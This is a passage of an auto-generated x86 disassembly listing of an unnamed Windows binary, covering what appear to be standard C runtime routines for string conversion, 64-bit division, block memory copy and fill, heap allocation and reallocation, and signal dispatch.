; ---------------------------------------------------------------------------
loc_40D67D: ; CODE XREF: sub_40D5D3+72�j
cmp esi, ebx
jz short loc_40D6AF
cmp edi, ebx
ja short loc_40D6AD
loc_40D685: ; CODE XREF: sub_40D5D3+141�j
; sub_40D5D3+149�j ...
call sub_4057D3
push 22h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40D622
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D622
; ---------------------------------------------------------------------------
loc_40D6AD: ; CODE XREF: sub_40D5D3+B0�j
mov [esi], al
loc_40D6AF: ; CODE XREF: sub_40D5D3+AC�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D6BC
mov dword ptr [eax], 1
loc_40D6BC: ; CODE XREF: sub_40D5D3+E1�j
; sub_40D5D3+12A�j ...
cmp [ebp+var_4], bl
jz loc_40D5F5
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D5F5
; ---------------------------------------------------------------------------
loc_40D6D1: ; CODE XREF: sub_40D5D3+64�j
lea ecx, [ebp+arg_4]
push ecx
push ebx
push edi
push esi
push 1
lea ecx, [ebp+arg_C]
push ecx
push ebx
mov [ebp+arg_4], ebx
push dword ptr [eax+4]
call ds:dword_41D138 ; WideCharToMultiByte
cmp eax, ebx
jz short loc_40D703
cmp [ebp+arg_4], ebx
jnz loc_40D65A
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_40D6BC
mov [ecx], eax
jmp short loc_40D6BC
; ---------------------------------------------------------------------------
loc_40D703: ; CODE XREF: sub_40D5D3+11A�j
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 7Ah
jnz loc_40D65A
cmp esi, ebx
jz loc_40D685
cmp edi, ebx
jbe loc_40D685
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
jmp loc_40D685
sub_40D5D3 endp
; =============== S U B R O U T I N E =======================================
sub_40D732 proc near ; CODE XREF: sub_4069D7+487�p
; sub_4069D7+8B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push 0
push [esp+4+arg_C]
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D5D3
add esp, 14h
retn
sub_40D732 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D750 proc near ; CODE XREF: sub_4069D7+786�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40D781
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40D7C8
; ---------------------------------------------------------------------------
loc_40D781: ; CODE XREF: sub_40D750+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40D78F: ; CODE XREF: sub_40D750+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40D78F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40D7BD
cmp edx, [esp+4+arg_4]
ja short loc_40D7BD
jb short loc_40D7C6
cmp eax, [esp+4+arg_0]
jbe short loc_40D7C6
loc_40D7BD: ; CODE XREF: sub_40D750+5D�j
; sub_40D750+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40D7C6: ; CODE XREF: sub_40D750+65�j
; sub_40D750+6B�j
xor ebx, ebx
loc_40D7C8: ; CODE XREF: sub_40D750+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40D750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40D86C+4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_40D805
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_40D805: ; CODE XREF: sub_40D7E5+18�j
; sub_40D7E5+7B�j
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_40D805
mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D86C proc near ; CODE XREF: sub_407370+42�j
; sub_407BF0+42�j ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_40D8EF
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_40D8C7
sub esi, ecx
push esi
push ebx
push eax
call sub_40D7E5
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_40D8C7: ; CODE XREF: sub_40D86C+46�j
test ecx, ecx
jz short loc_40D942
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D8EF: ; CODE XREF: sub_40D86C+37�j
cmp ecx, edi
jnz short loc_40D928
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_40D86C
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D928: ; CODE XREF: sub_40D86C+85�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_40D942: ; CODE XREF: sub_40D86C+5D�j
; sub_40D86C+81�j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40D86C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D94F proc near ; CODE XREF: sub_40777A+E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040DA54 SIZE 00000019 BYTES
push 0Ch
push offset dword_4217E0
call __SEH_prolog4
mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_40D992
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_40D992
call sub_4057D3
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
loc_40D98B: ; CODE XREF: sub_40D94F+E6�j
; sub_40D94F+F2�j
xor eax, eax
jmp loc_40DA67
; ---------------------------------------------------------------------------
loc_40D992: ; CODE XREF: sub_40D94F+13�j
; sub_40D94F+22�j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_40D9A2
xor esi, esi
inc esi
loc_40D9A2: ; CODE XREF: sub_40D94F+4E�j
; sub_40D94F+DB�j
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_40DA15
cmp dword_434DF4, 3
jnz short loc_40DA00
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, dword_434DE4
ja short loc_40DA00
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DA4B
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_40DA04
push [ebp+arg_0]
push edi
push ebx
call sub_407B70
add esp, 0Ch
loc_40DA00: ; CODE XREF: sub_40D94F+64�j
; sub_40D94F+78�j
cmp ebx, edi
jnz short loc_40DA65
loc_40DA04: ; CODE XREF: sub_40D94F+A2�j
push esi
push 8
push dword_425F68
call ds:dword_41D114 ; RtlAllocateHeap
mov ebx, eax
loc_40DA15: ; CODE XREF: sub_40D94F+5B�j
cmp ebx, edi
jnz short loc_40DA65
cmp dword_4262EC, edi
jz short loc_40DA54
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40D9A2
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_40D98B
mov dword ptr [eax], 0Ch
jmp loc_40D98B
sub_40D94F endp
; =============== S U B R O U T I N E =======================================
sub_40DA46 proc near ; DATA XREF: .rdata:004217F8�o
xor edi, edi
mov esi, [ebp+0Ch]
sub_40DA46 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DA4B proc near ; CODE XREF: sub_40D94F+98�p
push 4
call sub_40591F
pop ecx
retn
sub_40DA4B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40D94F
loc_40DA54: ; CODE XREF: sub_40D94F+D0�j
cmp ebx, edi
jnz short loc_40DA65
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_40DA65
mov dword ptr [eax], 0Ch
loc_40DA65: ; CODE XREF: sub_40D94F+B3�j
; sub_40D94F+C8�j ...
mov eax, ebx
loc_40DA67: ; CODE XREF: sub_40D94F+3E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40D94F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA6D proc near ; CODE XREF: sub_4077C2+C�p
; sub_40DC88+3E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0040DBBA SIZE 000000CE BYTES
push 10h
push offset dword_421800
call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_40DA8E
push [ebp+arg_4]
call sub_4036E0
pop ecx
jmp loc_40DC5A
; ---------------------------------------------------------------------------
loc_40DA8E: ; CODE XREF: sub_40DA6D+11�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40DAA1
push ebx
call sub_403603
pop ecx
jmp loc_40DC58
; ---------------------------------------------------------------------------
loc_40DAA1: ; CODE XREF: sub_40DA6D+26�j
cmp dword_434DF4, 3
jnz loc_40DC41
loc_40DAAE: ; CODE XREF: sub_40DA6D+169�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_40DC46
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_40DB77
cmp esi, dword_434DE4
ja short loc_40DB2A
push esi
push ebx
push eax
call sub_40601A
add esp, 0Ch
test eax, eax
jz short loc_40DAF5
mov [ebp+var_1C], ebx
jmp short loc_40DB2A
; ---------------------------------------------------------------------------
loc_40DAF5: ; CODE XREF: sub_40DA6D+81�j
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB2A
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB0D
mov eax, esi
loc_40DB0D: ; CODE XREF: sub_40DA6D+9C�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
call sub_405B25
mov [ebp+var_20], eax
push ebx
push eax
call sub_405B50
add esp, 18h
loc_40DB2A: ; CODE XREF: sub_40DA6D+72�j
; sub_40DA6D+86�j ...
cmp [ebp+var_1C], edi
jnz short loc_40DB77
cmp esi, edi
jnz short loc_40DB39
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_40DB39: ; CODE XREF: sub_40DA6D+C4�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push dword_425F68
call ds:dword_41D114 ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB77
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB61
mov eax, esi
loc_40DB61: ; CODE XREF: sub_40DA6D+F0�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
push [ebp+var_20]
call sub_405B50
add esp, 14h
loc_40DB77: ; CODE XREF: sub_40DA6D+66�j
; sub_40DA6D+C0�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DBB1
cmp [ebp+var_20], 0
jnz short loc_40DBBA
test esi, esi
jnz short loc_40DB8E
inc esi
loc_40DB8E: ; CODE XREF: sub_40DA6D+11E�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push dword_425F68
call ds:dword_41D154 ; RtlReAllocateHeap
mov edi, eax
jmp short loc_40DBBD
sub_40DA6D endp
; =============== S U B R O U T I N E =======================================
sub_40DBAB proc near ; DATA XREF: .rdata:00421818�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DBB1 proc near ; CODE XREF: sub_40DA6D+111�p
push 4
call sub_40591F
pop ecx
retn
sub_40DBB1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DA6D
loc_40DBBA: ; CODE XREF: sub_40DA6D+11A�j
mov edi, [ebp+var_1C]
loc_40DBBD: ; CODE XREF: sub_40DA6D+13C�j
test edi, edi
jnz loc_40DC84
cmp dword_4262EC, edi
jz short loc_40DBF9
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40DAAE
call sub_4057D3
cmp [ebp+var_20], edi
jnz short loc_40DC52
loc_40DBE6: ; CODE XREF: sub_40DA6D+1F8�j
mov esi, eax
call ds:dword_41D0F0 ; RtlGetLastWin32Error
push eax
call sub_405798
pop ecx
mov [esi], eax
jmp short loc_40DC58
; ---------------------------------------------------------------------------
loc_40DBF9: ; CODE XREF: sub_40DA6D+15E�j
test edi, edi
jnz loc_40DC84
call sub_4057D3
cmp [ebp+var_20], edi
jz short loc_40DC73
mov dword ptr [eax], 0Ch
jmp short loc_40DC84
; ---------------------------------------------------------------------------
loc_40DC13: ; CODE XREF: sub_40DA6D+1D7�j
test esi, esi
jnz short loc_40DC18
inc esi
loc_40DC18: ; CODE XREF: sub_40DA6D+1A8�j
push esi
push ebx
push 0
push dword_425F68
call ds:dword_41D154 ; RtlReAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_40DC84
cmp dword_4262EC, eax
jz short loc_40DC6A
push esi
call sub_408062
pop ecx
test eax, eax
jz short loc_40DC60
loc_40DC41: ; CODE XREF: sub_40DA6D+3B�j
cmp esi, 0FFFFFFE0h
jbe short loc_40DC13
loc_40DC46: ; CODE XREF: sub_40DA6D+49�j
push esi
call sub_408062
pop ecx
call sub_4057D3
loc_40DC52: ; CODE XREF: sub_40DA6D+177�j
mov dword ptr [eax], 0Ch
loc_40DC58: ; CODE XREF: sub_40DA6D+2F�j
; sub_40DA6D+18A�j
xor eax, eax
loc_40DC5A: ; CODE XREF: sub_40DA6D+1C�j
; sub_40DA6D+219�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40DC60: ; CODE XREF: sub_40DA6D+1D2�j
call sub_4057D3
jmp loc_40DBE6
; ---------------------------------------------------------------------------
loc_40DC6A: ; CODE XREF: sub_40DA6D+1C7�j
test edi, edi
jnz short loc_40DC84
call sub_4057D3
loc_40DC73: ; CODE XREF: sub_40DA6D+19C�j
mov esi, eax
call ds:dword_41D0F0 ; RtlGetLastWin32Error
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40DC84: ; CODE XREF: sub_40DA6D+152�j
; sub_40DA6D+18E�j ...
mov eax, edi
jmp short loc_40DC5A
; END OF FUNCTION CHUNK FOR sub_40DA6D
; =============== S U B R O U T I N E =======================================
sub_40DC88 proc near ; CODE XREF: sub_40780D+10�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jbe short loc_40DCBC
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, [esp+4+arg_8]
jnb short loc_40DCBC
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 0Ch
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DCBC: ; CODE XREF: sub_40DC88+9�j
; sub_40DC88+16�j
imul ecx, [esp+4+arg_8]
push ecx
push [esp+8+arg_0]
call sub_40DA6D
pop ecx
pop ecx
pop esi
retn
sub_40DC88 endp
; =============== S U B R O U T I N E =======================================
sub_40DCCF proc near ; CODE XREF: sub_407B19+27�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_426424, eax
mov dword_426428, eax
mov dword_42642C, eax
mov dword_426430, eax
retn
sub_40DCCF endp
; =============== S U B R O U T I N E =======================================
sub_40DCE8 proc near ; CODE XREF: sub_40DD29+5A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, dword_423E44
push esi
loc_40DCF3: ; CODE XREF: sub_40DCE8+1E�j
cmp [eax+4], edx
jz short loc_40DD08
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_40DCF3
loc_40DD08: ; CODE XREF: sub_40DCE8+E�j
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_40DD19
cmp [eax+4], edx
jz short locret_40DD1B
loc_40DD19: ; CODE XREF: sub_40DCE8+2A�j
xor eax, eax
locret_40DD1B: ; CODE XREF: sub_40DCE8+2F�j
retn
sub_40DCE8 endp
; =============== S U B R O U T I N E =======================================
sub_40DD1C proc near ; CODE XREF: sub_4101BD:loc_4101EA�p
push dword_42642C
call sub_405193
pop ecx
retn
sub_40DD1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD29 proc near ; CODE XREF: sub_4101BD+38�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040DED3 SIZE 00000006 BYTES
push 20h
push offset dword_421820
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_40DD91
jz short loc_40DD5C
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_40DD72
sub eax, ecx
jz short loc_40DD5C
sub eax, ecx
jz short loc_40DDBC
sub eax, ecx
jnz short loc_40DDA0
loc_40DD5C: ; CODE XREF: sub_40DD29+1C�j
; sub_40DD29+29�j
call sub_40531A
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_40DD7E
loc_40DD6A: ; CODE XREF: sub_40DD29+91�j
or eax, 0FFFFFFFFh
jmp loc_40DED3
; ---------------------------------------------------------------------------
loc_40DD72: ; CODE XREF: sub_40DD29+25�j
mov esi, offset dword_426424
mov eax, dword_426424
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DD7E: ; CODE XREF: sub_40DD29+3F�j
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_40DCE8
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_40DDEB
; ---------------------------------------------------------------------------
loc_40DD91: ; CODE XREF: sub_40DD29+1A�j
mov eax, ebx
sub eax, 0Fh
jz short loc_40DDD4
sub eax, 6
jz short loc_40DDC8
dec eax
jz short loc_40DDBC
loc_40DDA0: ; CODE XREF: sub_40DD29+31�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
jmp short loc_40DD6A
; ---------------------------------------------------------------------------
loc_40DDBC: ; CODE XREF: sub_40DD29+2D�j
; sub_40DD29+75�j
mov esi, offset dword_42642C
mov eax, dword_42642C
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDC8: ; CODE XREF: sub_40DD29+72�j
mov esi, offset dword_426428
mov eax, dword_426428
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDD4: ; CODE XREF: sub_40DD29+6D�j
mov esi, offset dword_426430
mov eax, dword_426430
loc_40DDDE: ; CODE XREF: sub_40DD29+53�j
; sub_40DD29+9D�j ...
mov [ebp+var_1C], 1
push eax
call sub_405193
loc_40DDEB: ; CODE XREF: sub_40DD29+66�j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_40DED3
cmp [ebp+var_20], eax
jnz short loc_40DE07
push 3
call sub_407AEA
loc_40DE07: ; CODE XREF: sub_40DD29+D5�j
cmp [ebp+var_1C], eax
jz short loc_40DE13
push eax
call sub_4059F7
pop ecx
loc_40DE13: ; CODE XREF: sub_40DD29+E1�j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_40DE27
cmp ebx, 0Bh
jz short loc_40DE27
cmp ebx, 4
jnz short loc_40DE42
loc_40DE27: ; CODE XREF: sub_40DD29+F2�j
; sub_40DD29+F7�j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DE75
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_40DE42: ; CODE XREF: sub_40DD29+FC�j
cmp ebx, 8
jnz short loc_40DE75
mov ecx, dword_423E38
mov [ebp+var_24], ecx
loc_40DE50: ; CODE XREF: sub_40DD29+14A�j
mov ecx, dword_423E3C
mov edx, dword_423E38
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_40DE7C
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_40DE50
; ---------------------------------------------------------------------------
loc_40DE75: ; CODE XREF: sub_40DD29+10A�j
; sub_40DD29+11C�j
call sub_40518A
mov [esi], eax
loc_40DE7C: ; CODE XREF: sub_40DD29+138�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DE9D
cmp ebx, 8
jnz short sub_40DEAC
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_40DEB0
sub_40DD29 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE97 proc near ; DATA XREF: .rdata:00421838�o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_40DE97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE9D proc near ; CODE XREF: sub_40DD29+15A�p
cmp dword ptr [ebp-1Ch], 0
jz short locret_40DEAB
push 0
call sub_40591F
pop ecx
locret_40DEAB: ; CODE XREF: sub_40DE9D+4�j
retn
sub_40DE9D endp
; =============== S U B R O U T I N E =======================================
sub_40DEAC proc near ; CODE XREF: sub_40DD29+162�j
push ebx
call dword ptr [ebp-20h]
loc_40DEB0: ; CODE XREF: sub_40DD29+16C�j
pop ecx
cmp ebx, 8
jz short loc_40DEC0
cmp ebx, 0Bh
jz short loc_40DEC0
cmp ebx, 4
jnz short loc_40DED1
loc_40DEC0: ; CODE XREF: sub_40DEAC+8�j
; sub_40DEAC+D�j
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DED1
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_40DED1: ; CODE XREF: sub_40DEAC+12�j
; sub_40DEAC+1D�j
xor eax, eax
sub_40DEAC endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40DD29
loc_40DED3: ; CODE XREF: sub_40DD29+44�j
; sub_40DD29+CC�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40DD29
; =============== S U B R O U T I N E =======================================
sub_40DED9 proc near ; CODE XREF: sub_407B19+21�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_426438, eax
retn
sub_40DED9 endp
; =============== S U B R O U T I N E =======================================
sub_40DEE3 proc near ; CODE XREF: sub_407B19+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_426444, eax
retn
sub_40DEE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DEED proc near ; CODE XREF: sub_40DF44+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_40DF0D
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
db 90h
; ---------------------------------------------------------------------------
loc_40DF0D: ; CODE XREF: sub_40DEED+16�j
; sub_40DEED+4E�j
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_40DF0D
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DEED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF44 proc near ; CODE XREF: sub_407B70+27�j
; sub_40DF44+7D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_40DF9E
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_40DF83
sub ecx, edx
push ecx
push eax
call sub_40DEED
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_40DF83: ; CODE XREF: sub_40DF44+2B�j
test edx, edx
jz short loc_40DFCC
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_40DFCC
; ---------------------------------------------------------------------------
loc_40DF9E: ; CODE XREF: sub_40DF44+1C�j
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
